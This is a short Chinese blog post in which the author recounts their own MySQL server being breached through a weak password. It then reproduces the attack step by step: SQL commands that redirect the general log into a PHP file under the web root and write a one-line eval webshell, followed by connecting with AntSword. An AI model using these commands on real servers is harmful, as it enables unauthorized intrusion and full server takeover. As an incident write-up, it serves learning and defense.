昨天疲惫的回到办公室,手机上推送过来一条消息“您的服务器被黑客攻击,存在文件webshell.php”,啊我寻思着没在这个服务器上做实验啊,于是赶快去查看这个文件,查看日志,在MySQL日志里面看到了奇怪的记录,如图。
看到这里明白了,这个服务器虽然没开上传文件的操作,但是我的MySQL是弱密码(已经改了这次长教训了),登进去我的SQL服务后,首先打开MySQL的日志记录选项,然后更改日志记录文件为网站根目录下的后缀为php的文件,于是输入一句带有木马代码的查询语句,webshell植入成功,蚁剑连接,直接拿下,还是管理员权限(哭~~~)。
现在复现一下攻击的具体过程:
1.利用弱密码登录MySQL,这里我直接登录phpmyadmin了。
2.进入SQL命令行输入以下语句
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log
set global general_log_file = 'C:/phpstudy/PHPTutorial/WWW/1.php'; #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>' #写入shell3.这样就成功间接的把后门脚本写入了服务器,使用蚁剑连接,可以看到成功获取服务器权限。
就是这样,纪念一下人生第一次被黑客攻击,同时也学到了新知识,不亏不亏。